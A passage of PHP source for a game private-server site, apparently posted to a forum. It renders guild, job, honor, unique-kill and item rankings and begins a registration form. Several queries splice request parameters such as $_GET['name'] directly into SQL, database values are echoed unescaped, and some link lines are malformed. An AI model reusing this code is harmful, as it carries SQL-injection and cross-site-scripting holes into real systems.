                $bExit = true;?>
        <span class="alert alert-error">Guild name contains forbidden symbols !</span>
        <?php }
            
            if(strlen($_POST['search_for']) == 0)
            {
                $bExit = true;?>
        <span class="alert alert-error">Guild name length can't be 0</span>
        <?php }
            
            if(strlen($_POST['search_for']) > 16)
            {
                $bExit = true;?>
        <span class="alert alert-error">Guild name too long</span>
        <?php }
            
            if(!$bExit)
            {
                core::$sql -> changeDB('shard');
                
                $hQuery = core::$sql -> exec("select top 50 * from _Guild where Name like '%$_POST[search_for]%'");
                
                if($nResults = mssql_num_rows($hQuery) > 0)
                {?>
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td>Guild name</td>
    </tr>
                        <?php while($row = mssql_fetch_array($hQuery))
                        {?>
    <tr>
        <td><a href='?pg=rank&type=guild&name=<?php echo $row[Name];?>'><b class="color-green"><?php echo $row[Name];?></b></a></td>
    </tr>
                        <?php }?>
</table>
<br /><br />Total results: [<b class="color-green"><?php echo $nResults;?></b>]<br />
<div class="pull-right"><?php echo misc::back();?></div><br />
                <?php }
                else echo "No results!<br /><br />";
            }
        }
        #echo "<br /><br />";
        #misc::back();?>
    </div><!--/row-fluid-->
</div><!--/container-->        
<!--=== End Content Part ===-->
    <?php
    }
    break;
    
    //Guilds Ranking
    
    case('guild'):
    {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Guild Ranking</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Guild Ranking</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid">
        <?php core::$sql -> changeDB('shard');
        if(!isset($_GET['name']))
        {
        
            $hQuery = core::$sql -> exec("select top 50 * from _Guild where ID > 0 and ID != 24 order by Lvl desc,GatheredSP desc");?>
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td align='center' class='thead'><b>#</b></td>
        <td align='center' class='thead'><b>Name</b></td>
        <td align='center' class='thead'><b>Level</b></td>
        <td align='center' class='thead'><b>Members</b></td>
        <td align='center' class='thead'><b>Points</b></td>
    </tr>
            <?php $nGuild = 1;
            while($row = mssql_fetch_array($hQuery))
            {
                $nMembers = core::$sql -> getRow("select count(*) from _GuildMember where GuildID='$row[ID]'");?>
    <tr>
        <td align='center'><b><?php echo $nGuild;?></b></td>
        <td align='center'><a href='?pg=rank&type=guild&name=<?php echo $row[Name];?>'><b class="color-green"><?php echo $row[Name];?></b></a></td>
        <td align='center'><?php echo $row[Lvl];?></td>
        <td align='center'><?php echo $nMembers;?></td>
        <td align='center'><?php echo $row[GatheredSP];?></td>
    </tr>
                <?php $nGuild++;
            }?>
</table>
<?php echo misc::back(); 
            #misc::back();
        }
        else
        {
            if(security::isSecureString($_GET['name'], 3))
            {
                if(core::$sql -> numRows("select * from _Guild where Name='$_GET[name]'") == 0)
                {
                    echo "Guild with such name not found.";
                }
                else
                {
                    $hGuildData = mssql_fetch_array(mssql_query("select * from _Guild where Name='$_GET[name]'"));
                    $hGuildMembers = core::$sql -> exec("select * from _GuildMember where GuildID='$hGuildData[ID]' order by MemberClass asc,Contribution DESC,GuildWarKill DESC,CharLevel DESC,GP_Donation DESC");
            
                    /*
                    for guild Gold add those lines :
                    
                    <td align='center'>Gold</td>
                    <td align='center'>$hGuildData[Gold]</td>
                    
                    */?>
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td align='center'><b>Name</b></td>
        <td align='center'><b class="color-green"><?php echo $hGuildData[Name];?></b></td>
    </tr>
    <tr>
        <td align='center'><b>Level</b></td>
        <td align='center'><?php echo $hGuildData[Lvl];?></td>
    </tr>
    <tr>
        <td align='center'><b>Points</b></td>
        <td align='center'><?php echo $hGuildData[GatheredSP];?></td>
    </tr>
    <tr>
        <td align='center'><b>Foundation</b></td>
        <td align='center'><?php echo $hGuildData[FoundationDate];?></td>
    </tr>
</table>

<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td width='5%' align='center' class='thead'><b>#</td>
        <td width='5%' align='center' class='thead'><b>Race</b></td>
        <td width='15%' align='center' class='thead'><b>Charname</b></td>
        <td width='15%' align='center' class='thead'><b>Nick</b></td>
        <td width='10%' align='center' class='thead'><b>Level</b></td>
        <td width='15%' align='center' class='thead'><b>Donation</b></td>
        <td width='15%' align='center' class='thead'><b>Guild War Kills</b></td>
        <td width='15%' align='center' class='thead'><b>Guild War Killed</b></td>
        <td width='15%' align='center' class='thead'><b>Type</b></td>
    </tr>
                            <?php $n = 1;
                        while($row = mssql_fetch_array($hGuildMembers))
                        {
                            $cName = char::charnameByCharID($row['CharID']);
                            $szNickname = "";
                            
                            $nRefObjID = core::$sql -> getRow("select RefObjID from _Char where CharName16='$cName'");
                            $icon = "";
                            if($nRefObjID < 3000) $icon = "<img src='img/Character/race_china.png'>";
                            else $icon="<img src='img/Character/race_euro.png'>";
                            
                            $memberType = "";
                            if($row['MemberClass'] == 0) $memberType = "<font class='color-red'>Master</font>";
                            else
                            $memberType = "Member";
                            
                            if(empty($row['Nickname'])) $szNickname = "<font color='blue'>NONE</font>";
                            else $szNickname = $row['Nickname'];?>
    <tr>
        <td align='center'><?php echo $n;?></td>
        <td align='center'><?php echo $icon;?></td>
        <td align='center'><a href='?pg=rank&type=char&name=<?php echo $cName;?>'><b class="color-green"><?php echo $cName;?></a></td>
        <td align='center'><?php echo $szNickname;?></td>
        <td align='center'><?php echo $row[CharLevel];?></td>
        <td align='center'><?php echo $row[GP_Donation];?></td>
        <td align='center'><?php echo $row[GuildWarKill];?></td>
        <td align='center'><?php echo $row[GuildWarKilled];?></td>
        <td align='center'><?php echo $memberType;?></td>
    </tr>
                        <? $n++;
                         }
echo "</table>";
                        misc::back();    
                }
            }    else echo "Invalid guild name.";
        }?>
    </div><!--/row-fluid-->
</div><!--/container-->        
<!--=== End Content Part ===-->
<?php 
    }
    break;
    
    //Unique Kills Ranking
    
    case('unique'):
    {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Unique Ranking</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Unique Ranking</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid">
        <?php core::$sql -> changeDB('acc');
        $n = 1;
        $hQuery = core::$sql -> exec("select top 100 * from Evangelion_uniques order by time desc");?>
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td>#</td>
        <td>Charname</td>
        <td>Unique</td>
        <td>Time</td>
</tr>
        <?php while($row = mssql_fetch_array($hQuery))
        {
                $UniqueType = $row['MobName'];
                switch($UniqueType) {
                // Tiger Girl
                case "MOB_CH_TIGERWOMAN":
                echo '<tr><td>'.$n.'</td><td><a href="?pg=rank&type=char&name='.$row['CharName'].'"><b class="color-green">'.$row['CharName'].'</b></a></td><td>Tiger Girl</td><td>'.$row['time'].'</td></tr>';
                break;
                //Cerberus
                case "MOB_EU_KERBEROS":
                echo '<tr><td>'.$n.'</td><td><a href="?pg=rank&type=char&name='.$row['CharName'].'"><b class="color-green">'.$row['CharName'].'</b></a></td><td>Cerberus</td><td>'.$row['time'].'</td></tr>';
                break;
                //Captain Ivy
                case "MOB_AM_IVY":
                echo '<tr><td>'.$n.'</td><td><a href="?pg=rank&type=char&name='.$row['CharName'].'"><b class="color-green">'.$row['CharName'].'</b></a></td><td>Captain Ivy</td><td>'.$row['time'].'</td></tr>';
                break;
                //Uruchi
                case "MOB_OA_URUCHI":
                echo '<tr><td>'.$n.'</td><td><a href="?pg=rank&type=char&name='.$row['CharName'].'"><b class="color-green">'.$row['CharName'].'</b></a></td><td>Uruchi</td><td>'.$row['time'].'</td></tr>';
                break;
                //Isyutaru
                case "MOB_KK_ISYUTARU":
                echo '<tr><td>'.$n.'</td><td><a href="?pg=rank&type=char&name='.$row['CharName'].'"><b class="color-green">'.$row['CharName'].'</b></a></td><td>Isyutaru</td><td>'.$row['time'].'</td></tr>';
                break;
                //Lord Yarkan
                case "MOB_TK_BONELORD":
                echo '<tr><td>'.$n.'</td><td><a href="?pg=rank&type=char&name='.$row['CharName'].'"><b class="color-green">'.$row['CharName'].'</b></a></td><td>Lord Yarkan</td><td>'.$row['time'].'</td></tr>';
                break;
                //Demon Shaitan
                case "MOB_RM_TAHOMET":
                echo '<tr><td>'.$n.'</td><td><a href="?pg=rank&type=char&name='.$row['CharName'].'"><b class="color-green">'.$row['CharName'].'</b></a></td><td>Demon Shaitan</td><td>'.$row['time'].'</td></tr>';
                break;
                //Medusa
                case "MOB_TQ_BLACKSNAKE":
                echo '<tr><td>'.$n.'</td><td><a href="?pg=rank&type=char&name='.$row['CharName'].'"><b class="color-green">'.$row['CharName'].'</b></a></td><td>SoSo The Black Viper    </td><td>'.$row['time'].'</td></tr>';
                break;
                //Anything Else will be posted has pk2 name (must be added to those lines if you wanna add a real name.
                default:
                break;
                }
            $n++;
        }?>
</table>
    </div><!--/row-fluid-->
</div><!--/container-->        
<!--=== End Content Part ===-->
<?php 
    }
    break;
    
    // Job Ranking
    
    case('job'):
    {
        core::$sql -> changeDB("shard");
        $hQuery = core::$sql -> exec("select top 50 * from _CharTrijob order by Contribution desc, Exp desc, Level desc");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Job Rankings</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Job Rankings</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid">
<table class='table table-striped' border='0' cellpadding='0' cellspacing='0'>
    <tr>
        <td align='center'><a href='?pg=rank&type=jobtrader'><img src='img/trader-icon.png' alt='Trader'/> Trader</a></td>
        <td align='center'><a href='?pg=rank&type=jobthief'><img src='img/thief-icon.png' alt='Thief'/>  Thief</a></td>
        <td align='center'><a href='?pg=rank&type=jobhunter'><img src='img/hunter-icon.png' alt='Hunter'/> Hunter</a></td>
        <td align='center'><a href='?pg=rank&type=job'><img src='img/trader-icon.png' alt='Trader'/><img src='img/hunter-icon.png' alt='Hunter'/><img src='img/thief-icon.png' alt='Thief'/> All</a></td>
    </tr>
</table>
<table class='table table-striped' border='0' cellpadding='0' cellspacing='0'>
    <tr>
        <td align='center'><b>#</b></td>
        <td align='center'><b>Char name</b></td>
        <td align='center'><b>Job type</b></td>
        <td align='center'><b>Exp</b></td>
        <td align='center'><b>Contribution</b></td>
    </tr>
        <?php $n = 1;
        while($row = mssql_fetch_array($hQuery))
        {
            $jobType = char::jobTypeByID($row['JobType']);
            $charName = char::charnameByCharID($row['CharID']);?>
    <tr>
        <td align='center'><b><?php echo $n;?></b></td>
        <td align='center'><a href='?pg=rank&type=char&name=<?php echo $charName;?>'><?php echo $charName;?></a></td>
        <td align='center'><?php echo $jobType;?></td>
        <td align='center'><?php echo $row[Exp];?></td>
        <td align='center'><?php echo $row[Contribution];?></td>
    </tr>
            <?php $n++;
        }?>
</table>
    </div><!--/row-fluid-->
</div><!--/container-->        
<!--=== End Content Part ===-->
        <?php break;        
    }
    
    //Job Ranking - Thiefs Only    

    case('jobthief'):
    {
        core::$sql -> changeDB("shard");
        $hQuery = core::$sql -> exec("select top 50 * from _CharTrijob where JobType = 2 order by Contribution desc, Exp desc, Level desc");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Job Thief</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Job Thief</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid">
<table class='table table-striped' border='0' cellpadding='0' cellspacing='0'>
    <tr>
        <td align='center'><a href='?pg=rank&type=jobtrader'><img src='img/trader-icon.png' alt='Trader'/> Trader</a></td>
        <td align='center'><a href='?pg=rank&type=jobthief'><img src='img/thief-icon.png' alt='Thief'/>  Thief</a></td>
        <td align='center'><a href='?pg=rank&type=jobhunter'><img src='img/hunter-icon.png' alt='Hunter'/> Hunter</a></td>
        <td align='center'><a href='?pg=rank&type=job'><img src='img/trader-icon.png' alt='Trader'/><img src='img/hunter-icon.png' alt='Hunter'/><img src='img/thief-icon.png' alt='Thief'/> All</a></td>
    </tr>
</table>

<table class='table table-striped' border='0' cellpadding='0' cellspacing='0'>
    <tr>
        <td align='center'><b>#</b></td>
        <td align='center'><b>Char name</b></td>
        <td align='center'><b>Job type</b></td>
        <td align='center'><b>Exp</b></td>
        <td align='center'><b>Contribution</b></td>
    </tr>
        <?php $n = 1;
        while($row = mssql_fetch_array($hQuery))
        {
            $jobType = char::jobTypeByID($row['JobType']);
            $charName = char::charnameByCharID($row['CharID']);?>
    <tr>
        <td align='center'><b><?php echo $n;?></b></td>
        <td align='center'><a href='?pg=rank&type=char&name=<?php echo $charName;?>'>$charName;?></a></td>
        <td align='center'><?php echo $jobType;?></td>
        <td align='center'><?php echo $row[Exp];?></td>
        <td align='center'><?php echo $row[Contribution];?></td>
    </tr>
            <?php $n++;
        }?>
</table>
    </div><!--/row-fluid-->
</div><!--/container-->        
<!--=== End Content Part ===-->
        <?php break;        
        
    }
    
    //Job Ranking - Hunters Only
    
    case('jobhunter'):
    {
        core::$sql -> changeDB("shard");
        $hQuery = core::$sql -> exec("select top 50 * from _CharTrijob where JobType = 3 order by Contribution desc, Exp desc, Level desc");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Job Hunter</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Job Hunter</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid">
<table class='table table-striped' border='0' cellpadding='0' cellspacing='0'>
    <tr>
        <td align='center'><a href='?pg=rank&type=jobtrader' ><img src='img/trader-icon.png' alt='Trader'/> Trader</a></td>
        <td align='center'><a href='?pg=rank&type=jobthief'><img src='img/thief-icon.png' alt='Thief'/>  Thief</a></td>
        <td align='center'><a href='?pg=rank&type=jobhunter'><img src='img/hunter-icon.png' alt='Hunter'/> Hunter</a></td>
        <td align='center'><a href='?pg=rank&type=job'><img src='img/trader-icon.png' alt='Trader'/><img src='img/hunter-icon.png' alt='Hunter'/><img src='img/thief-icon.png' alt='Thief'/> All</a></td>
    </tr>
</table>

<table class='table table-striped' border='0' cellpadding='0' cellspacing='0'>
    <tr>
        <td align='center'><b>#</b></td>
        <td align='center'><b>Char name</b></td>
        <td align='center'><b>Job type</b></td>
        <td align='center'><b>Exp</b></td>
        <td align='center'><b>Contribution</b></td>
    </tr>
        <?php $n = 1;
        while($row = mssql_fetch_array($hQuery))
        {
            $jobType = char::jobTypeByID($row['JobType']);
            $charName = char::charnameByCharID($row['CharID']);?>
    <tr>
        <td align='center'><b><?php echo $n;?></b></td>
        <td align='center'><a href='?pg=rank&type=char&name=<?php echo $charName;?>'><?php echo $charName;?></a></td>
        <td align='center'><?php echo $jobType;?></td>
        <td align='center'><?php echo $row[Exp];?></td>
        <td align='center'><?php echo $row[Contribution];?></td>
    </tr>
            <?php $n++;
        }?>
</table>
    </div><!--/row-fluid-->
</div><!--/container-->        
<!--=== End Content Part ===-->
        <?php break;        
    }
    
    //Job Ranking - Trader Only
    
    case('jobtrader'):
    {
        core::$sql -> changeDB("shard");
        $hQuery = core::$sql -> exec("select top 50 * from _CharTrijob where JobType = 1 order by Contribution desc, Exp desc, Level desc");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Job Trader</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Job Trader</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid">     
<table class='table table-striped' border='0' cellpadding='0' cellspacing='0'>
    <tr>
        <td align='center'><a href='?pg=rank&type=jobtrader'><img src='img/trader-icon.png' alt='Trader'/> Trader</a></td>
        <td align='center'><a href='?pg=rank&type=jobthief'><img src='img/thief-icon.png' alt='Thief'/>  Thief</a></td>
        <td align='center'><a href='?pg=rank&type=jobhunter'><img src='img/hunter-icon.png' alt='Hunter'/> Hunter</a></td>
        <td align='center'><a href='?pg=rank&type=job'><img src='img/trader-icon.png' alt='Trader'/><img src='img/hunter-icon.png' alt='Hunter'/><img src='img/thief-icon.png' alt='Thief'/> All</a></td>
    </tr>
</table>

<table class='table table-striped' border='0' cellpadding='0' cellspacing='0'>
    <tr>
        <td align='center'><b>#</b></td>
        <td align='center'><b>Char name</b></td>
        <td align='center'><b>Job type</b></td>
        <td align='center'><b>Exp</b></td>
        <td align='center'><b>Contribution</b></td>
    </tr>
        <?php $n = 1;
        while($row = mssql_fetch_array($hQuery))
        {
            $jobType = char::jobTypeByID($row['JobType']);
            $charName = char::charnameByCharID($row['CharID']);?>
    <tr>
        <td align='center'><b><?php echo $n;?></b></td>
        <td align='center'><a href='?pg=rank&type=char&name=$charName;?>'>$charName;?></a></td>
        <td align='center'><?php echo $jobType;?></td>
        <td align='center'><?php echo $row[Exp];?></td>
        <td align='center'><?php echo $row[Contribution];?></td>
    </tr>
<?php $n++;
        }?>
</table>
    </div><!--/row-fluid-->
</div><!--/container-->        
<!--=== End Content Part ===-->
        <?php break;        
        
    }
    
    //Honor Ranking
    
    case('honor'):
    {
        core::$sql -> changeDB("shard");
        
        $hHonorRank = core::$sql -> exec("select * from _TrainingCampHonorRank where CampID IS NOT NULL order by Ranking ASC");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Honor Rankings</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Honor Rankings</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid">
<table class='table table-striped' border='0' cellpadding='0' cellspacing='0'>
    <tr>
        <td align='center'><b>#</b></td>
        <td align='center'><b>Owner</b></td>
        <td align='center'><b>Graduates</b></td>
    </tr>
<?php 
        while($row = mssql_fetch_array($hHonorRank))
        {
            $data = misc::getCampDataByID($row['CampID']);?>
    <tr>
        <td align='center'><b><?php echo $row[Ranking];?></b></td>
        <td align='center'><a href='?pg=rank&type=char&name=<?php echo $data[OwnerName];?>'><?php echo $data[OwnerName];?></a></td>
        <td align='center'><?php echo $data[GraduateCount];?></td>
    </tr>
        <?php }?>    
</table>
    </div><!--/row-fluid-->
</div><!--/container-->        
<!--=== End Content Part ===-->
    <?php }
    break;
    
    //We'll be added in future updates.
    
    case('set_plus'):
        core::$sql -> changeDB("shard");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Character Items</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Character Items</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td><b>Char Name</b></td>
        <td><b>Image</b></td>
        <td><b>Item Name</b></td>
        <td><b>Type</b></td>
        <td><b>Level</b></td>
        <td><b>Plus Value</b></td>
    </tr>
        <?php $query = core::$sql -> exec("
            select top 50 it.OptLevel, ch.CharName16, obj.AssocFileIcon128, obj.Country, obj.CodeName128, obj.ReqLevel1 , item.ItemClass , adv.nOptValue ,es.EndTextString
            from _Items as it
            LEFT JOIN [dbo].[_Inventory] as inv ON it.ID64 = inv.ItemID
            LEFT JOIN [dbo].[_Char] as ch ON inv.CharID = ch.CharID
            LEFT JOIN [dbo].[_RefObjCommon] as obj ON it.RefItemID = obj.ID
            LEFT JOIN [dbo].[_RefObjItem] as item ON obj.Link = item.ID
            LEFT JOIN [dbo].[_BindingOptionWithItem] as adv ON it.ID64 = adv.nItemDBID
            LEFT JOIN [dbo].[C_EquipStrings] as es on obj.NameStrID128 = es.TextString
            where ch.CharName16 is not NULL and CodeName128 not like '%stone%' and CharName16 not like '%]%'
            ORDER BY it.OptLevel DESC, obj.ReqLevel1 DESC, item.ItemClass DESC, adv.nOptValue DESC
        ");
            
        while ($row = mssql_fetch_array($query)){?>        
    <tr>
        <td align="center"><a href="?pg=rank&type=char&name=<?php echo $row['CharName16'];?>"><?php echo $row['CharName16'];?></a></td>
        <td align="center"><img src="./<?php echo $row['AssocFileIcon128'];?>.png" width="32" height="32"  alt=""/></td>
        <td><?php echo $row['EndTextString'];?></td>
        <?php $totalvalue = $row['OptLevel']+$row['nOptValue'];
        $advonly = $row['nOptValue'];
        $itemclass = $row['ItemClass'];
        switch($itemclass) {
        case 1:
        echo '<td>Normal</td>';
        break;
        case 2:
        echo '<td>Seal Of Moon</td>';
        break;
        case 3:
        echo '<td>Seal Of Sun</td>';
        break;
        case 4:
        echo '<td>Normal</td>';
        break;
        case 5:
        echo '<td>Seal Of Moon</td>';
        break;
        case 6:
        echo '<td>Seal Of Sun</td>';
        break;
        case 7:
        echo '<td>Normal</td>';
        break;
        case 8:
        echo '<td>Seal Of Star</td>';
        break;
        case 9:
        echo '<td>Seal Of Moon</td>';
        break;
        case 10:
        echo '<td>Seal Of Sun</td>';
        break;
        case 11:
        echo '<td>Normal</td>';
        break;
        case 12:
        echo '<td>Seal Of Star</td>';
        break;
        case 13:
        echo '<td>Seal Of Moon</td>';
        break;
        case 14:
        echo '<td>Seal Of Sun</td>';
        break;
        case 15:
        echo '<td>Normal</td>';
        break;
        case 16:
        echo '<td>Seal Of Star</td>';
        break;
        case 17:
        echo '<td>Seal Of Moon</td>';
        break;
        case 18:
        echo '<td>Seal Of Sun</td>';
        break;
        case 19:
        echo '<td>Normal</td>';
        break;
        case 20:
        echo '<td>Seal Of Star</td>';
        break;
        case 21:
        echo '<td>Seal Of Moon</td>';
        break;
        case 22:
        echo '<td>Seal Of Sun</td>';
        break;
        case 23:
        echo '<td>Normal</td>';
        break;
        case 24:
        echo '<td>Seal Of Star</td>';
        break;
        case 25:
        echo '<td>Seal Of Moon</td>';
        break;
        case 26:
        echo '<td>Seal Of Sun</td>';
        break;
        case 27:
        echo '<td>Normal</td>';
        break;
        case 28:
        echo '<td>Seal Of Star</td>';
        break;
        case 29:
        echo '<td>Seal Of Moon</td>';
        break;
        case 30:
        echo '<td>Seal Of Sun</td>';
        break;
        default:
        echo '<td>Normal</td>';
        break;
        }
        echo '<td align="center">'.$row['ReqLevel1'].'</td>';
        echo '<td>'.$totalvalue.'';
        switch($advonly) {
        case "NULL":
        break;
        case 1:
        echo '+(1) ADV</td>';
        break;
        case 2:
        echo '+(2) ADV</td>';
        break;
        }
        echo '</tr>';
        }?>
    </tr>
</table>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
    <?php break;
    
    
    
    case('set_char'):
$nCharName = $_GET['name'];
core::$sql -> changeDB("shard");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Character Items</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Character Items</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td><b>Char Name</b></td>
        <td><b>Image</b></td>
        <td><b>Item Name</b></td>
        <td><b>Type</b></td>
        <td><b>Level</b></td>
        <td><b>Plus Value</b></td>
    </tr>
<?php $query = core::$sql -> exec("
select it.OptLevel, ch.CharName16, obj.AssocFileIcon128, obj.Country, obj.CodeName128 ,obj.ReqLevel1 , item.ItemClass , adv.nOptValue ,es.EndTextString
from _Items as it
LEFT JOIN [dbo].[_Inventory] as inv ON it.ID64 = inv.ItemID
LEFT JOIN [dbo].[_Char] as ch ON inv.CharID = ch.CharID
LEFT JOIN [dbo].[_RefObjCommon] as obj ON it.RefItemID = obj.ID
LEFT JOIN [dbo].[_RefObjItem] as item ON obj.Link = item.ID
LEFT JOIN [dbo].[_BindingOptionWithItem] as adv ON it.ID64 = adv.nItemDBID
LEFT JOIN [dbo].[C_EquipStrings] as es on obj.NameStrID128 = es.TextString
where ch.CharName16 = '$nCharName' and inv.Slot between 0 and 12 and inv.Slot != 8
");
while ($row = mssql_fetch_array($query)){
echo '<tr>';
echo '<td align="center"><a href="?pg=rank&type=char&name='.$row['CharName16'].'">'.$row['CharName16'].'</a></td>';
if($row['AssocFileIcon128'] == 'xxx'){
echo '<td><img src="./item/clean.png" width="32" height="32"  alt=""/></td>';
} else {
echo '<td><img src="./'.$row['AssocFileIcon128'].'.png" width="32" height="32"  alt=""/></td>';
}
if($row['CodeName128'] == 'DUMMY_OBJECT'){
echo '<td>-</td>';
} else {
echo '<td>'.$row['EndTextString'].'</td>';        
}
$totalvalue = $row['OptLevel']+$row['nOptValue'];
$advonly = $row['nOptValue'];
if($row['CodeName128'] == 'ITEM_ETC_AMMO_ARROW_01' || $row['CodeName128'] == 'ITEM_ETC_AMMO_BOLT_01' || $row['CodeName128'] == 'DUMMY_OBJECT'){
echo '<td>-</td>';
} else {
$itemclass = $row['ItemClass'];
switch($itemclass) {
case 27:
echo '<td>Normal</td>';
break;
case 28:
echo '<td>Seal Of Star</td>';
break;
case 29:
echo '<td>Seal Of Moon</td>';
break;
case 30:
echo '<td>Seal Of Sun</td>';
break;
default:
echo '<td>Normal</td>';
break;
}}
if($row['CodeName128'] == 'ITEM_ETC_AMMO_ARROW_01' || $row['CodeName128'] == 'ITEM_ETC_AMMO_BOLT_01' || $row['CodeName128'] == 'DUMMY_OBJECT'){
echo '<td>-</td>';
} else {
echo '<td>'.$row['ReqLevel1'].'</td>';
}
if($row['CodeName128'] == 'ITEM_ETC_AMMO_ARROW_01' || $row['CodeName128'] == 'ITEM_ETC_AMMO_BOLT_01' || $row['CodeName128'] == 'DUMMY_OBJECT'){
echo '<td>-</td>';
} else {
echo '<td>'.$totalvalue.'';
switch($advonly) {
case "NULL":
break;
case 1:
echo '+(1) ADV</td>';
break;
case 2:
echo '+(2) ADV</td>';
break;
}}
echo '</tr>';
}?>    
</table>
<?php echo misc::back();?>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->

    <?php break;
    
    // Default Page (Without Page Selected) .
    
    default:
    {
        //list functions
        
        break;
    }
}

?>

reg

كود PHP:

<?php
global $core;
    if(isset($_GET['ref']))
    {
        if(security::isSecureString($_GET['ref'], 3) && $core -> aConfig['allowRefferals'] == 1)
        {
            $_SESSION['ref'] = $_GET['ref'];
        }
    }
    
    if(isset($_POST['submit']) && $_POST['submit'] != 'login')
    {
        $errors = array();
        if(strlen($_POST['username']) > 16) $errors[] = "Username too long";
        if(strlen($_POST['username']) < 3)    $errors[] = "Username too short";
        if(strlen($_POST['pass1']) > 32)    $errors[] = "Password [1] too long";
        if(strlen($_POST['pass1']) < 6)     $errors[] = "Password [1] too short";
        if(strlen($_POST['pass2']) > 32)    $errors[] = "Password [2] too long";
        if(strlen($_POST['pass2']) < 6)        $errors[] = "Password [2] too short";
        if(strlen($_POST['email']) > 54)    $errors[] = "Email too long";
        if(strlen($_POST['email']) < 6)    $errors[] = "Email too short";
        /******** Answers Sec *********/
        if(strlen($_POST['sec_question']) > 54)    $errors[] = "Security Question too long";
        if(strlen($_POST['sec_question']) < 3)    $errors[] = "Security Question too short";
        if(strlen($_POST['sec_answer']) > 54)    $errors[] = "Security Answer too long";
        if(strlen($_POST['sec_answer']) < 3)    $errors[] = "Security Answer too short";
        
        if(!security::isSecureString($_POST['username'], 3))         $errors[] = "Username field contains forbidden symbols";
        if(!security::isSecureString($_POST['pass1'], 3))             $errors[] = "Password [1] field contains forbidden symbols";
        if(!security::isSecureString($_POST['pass2'] ,3))             $errors[] = "Password [2] field contains forbidden symbols";
        if(!security::isSecureString($_POST['email'], 2))             $errors[] = "Email field contains forbidden symbols";
